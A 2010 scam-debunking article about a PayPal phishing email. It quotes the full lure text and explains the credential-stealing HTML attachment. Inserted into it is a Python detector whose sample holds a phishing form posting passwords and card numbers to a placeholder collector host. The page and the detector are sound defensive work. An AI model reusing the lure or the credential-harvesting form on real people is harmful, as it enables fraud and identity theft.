Debunking email hoaxes and exposing Internet scams since 2003!

Issue 103 - June 2010 - Page 10

Pages in this month's issue:
  1. Image Showing a Kayak in the Mouth of a Whale
  2. Becoming a Father or Mother Facebook Group Pedophile Warning Hoax
  3. Coca-Cola Online Promo Advance Fee Scam
  4. LeBleu Family Prayer Request Message
  5. Liquid Mountaineering Video - Walking on Water
  6. Cessna Citation Engines Damaged by Volcanic Ash Hoax
  7. Killer House Plant Warning
  8. iTunes Gift Certificate Trojan Email
  9. Russian K-7 Heavy Bomber Images
  10. PayPal New Message Phishing Scam
  11. Letter Z To Be Removed from the Alphabet Hoax
  12. Refugee Monthly Allowance From Australian Government Hoax
  13. FIFA 2010 World Cup Lottery Scam
  14. Audri King Prayer Request
  15. Distracting Beach Babes Facebook Malware Attack
  16. Michael Verster Missing Child Alert
  17. Kevin Carter Pulitzer Prize Photograph

PayPal New Message Phishing Scam

Outline
An email purporting to be a "new message" from PayPal claims that an error has been detected in the recipient's PayPal account and that he or she must submit an attached form verifying his or her details or risk having the account suspended.



Brief Analysis
The email is not from PayPal. The claim that there is a problem with the recipient's account is a lie designed to trick him or her into submitting PayPal account details to Internet criminals. Any information entered on the bogus form can be collected by criminals and used to hijack the user's PayPal and credit card accounts.

Detailed analysis and references below example.

Last updated: 1st May 2010
First published: 1st May 2010
Article written by Brett M. Christensen


Example
Subject: You have a new message from PayPal !

Dear PayPal Customer,

During our regularly scheduled account maintenance and verification procedure we have detected a slight error in your PayPal online account.

This might be due to the following reasons:

1. A recent change in your personal information (ie. change of address, email address)

2. An inability to accurately verify your selected option of payment due to an internal error within our systems.

Please fill in all the details that are required to complete this verification process.

To do this we have attached a form to this email. Please download the form and follow the instructions on your screen. NOTE: The form needs to be opened in a modern browser which has javascript enabled (ex: Internet Explorer 7, Firefox 3, Safari 3, Opera 9)

Please understand that this is a security measure intended to help protect you and your account. We apologize for any inconvenience.

If you choose to ignore our request, you leave us no choice but to temporary suspend your account.

Sincerely, PayPal Account Review Department.

Please do not reply to this e-mail. Mail sent to this address cannot be answered. For assistance, log in to your PayPal account and choose the "Help" link in the footer of any page.




Detailed Analysis
This email, which claims to be from popular online payment service PayPal, informs the recipient that an error has been found in his or her PayPal account and the account must therefore be verified to avoid suspension. The message instructs the recipient to fill in and submit a form attached to the email. The form asks for the user's PayPal email address and password along with credit card details and personal identity information.

However, the message is a phishing scam and certainly is not from PayPal. The claim that there is a problem with the recipient's PayPal account is a lie designed to fool him or her into complying with the fraudulent instructions and submitting personal and financial information. All of the information submitted on the bogus form can be collected by the criminals operating the scam and subsequently used for fraud and identity theft.

Because of its high profile and because it conducts the majority of its business and transactions online, PayPal has become a favourite target of phishing scammers. Criminals constantly use and reuse a great many variations of the above scam in order to trick victims into relinquishing their sensitive personal information. While this version includes the bogus form as an attached file, others may entice the recipient into clicking a link and visiting a fraudulent website designed to resemble the genuine PayPal site. The scammers often use tricks such as address spoofing and disguised links to make their messages seem more legitimate. They may also use PayPal logos and other graphics stolen from the genuine PayPal website to further the illusion that their messages are genuine.

PayPal will never send you an unsolicited email asking you to submit account login details, bank or credit card details or other personal information such as your full name and driver's license numbers. Thus, if you receive an email that asks you to submit such details, then you should treat it with the utmost caution. If you receive such an email, do not open any attachments that may come with the email. Do not click any links in the email. PayPal has published information warning its customers about such phishing scams.

In the past it has been more common for phishing scammers to use direct links to bogus "look-alike" websites that try to trick victims into submitting information. However, in an increasingly common ploy, the scammers now often include the fraudulent web form as an HTML email attachment. Clicking the attachment opens the bogus form in the user's web browser. The form is coded to ensure that all information entered into the form will be automatically sent to the scammers when the "Submit" button is pressed. Scammers are apparently making more use of email attachments in an attempt to get around the increasingly sophisticated anti-phishing filters now being used by modern web browsers and computer security software.
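
The attachment ploy described above can be checked for at a mail gateway or during triage. The following is an added example, not code from Hoax-Slayer or PayPal: it parses a message, finds HTML attachments, and reports any form that sends password or card fields to a remote host. The field-name hints, the sample message and the host `collector.example.test` are constructed assumptions.

```python
from email import message_from_string, policy
from html.parser import HTMLParser
from urllib.parse import urlparse

SENSITIVE = ("pass", "card", "cvv", "ssn")  # assumed field-name hints

class FormScanner(HTMLParser):
    """Collect each <form>'s action URL and its <input> names and types."""
    def __init__(self):
        super().__init__()
        self.forms = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "fields": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["fields"].append(
                ((a.get("name") or "").lower(), (a.get("type") or "text").lower()))

def scan_message(raw):
    """Flag HTML attachments whose forms send credential fields to a remote host."""
    msg = message_from_string(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        scanner = FormScanner()
        scanner.feed(part.get_content())
        for form in scanner.forms:
            # A form that posts to an absolute URL leaves the local file for a server.
            host = urlparse(form["action"]).hostname
            risky = [n for n, t in form["fields"]
                     if t == "password" or any(h in n for h in SENSITIVE)]
            if host and risky:
                findings.append((part.get_filename(), host, risky))
    return findings

# Constructed sample (not the real scam attachment); the host is a placeholder.
SAMPLE = """\
Subject: You have a new message from PayPal !
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html
Content-Disposition: attachment; filename="form.html"

<form action="http://collector.example.test/save" method="post">
<input name="email"><input type="password" name="pw"><input name="card_number"></form>
--b1--
"""
```

Calling `scan_message(SAMPLE)` returns one finding naming the attachment, the remote host the form posts to, and the sensitive fields it collects; a message without HTML attachments returns an empty list.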

References
Phishing Scams - Anti-Phishing Information
Phishing Scam Targets PayPal Users
Email Worm Spoofing - Spoofing Explained
Check Links in HTML Emails
PayPal Phishing Guide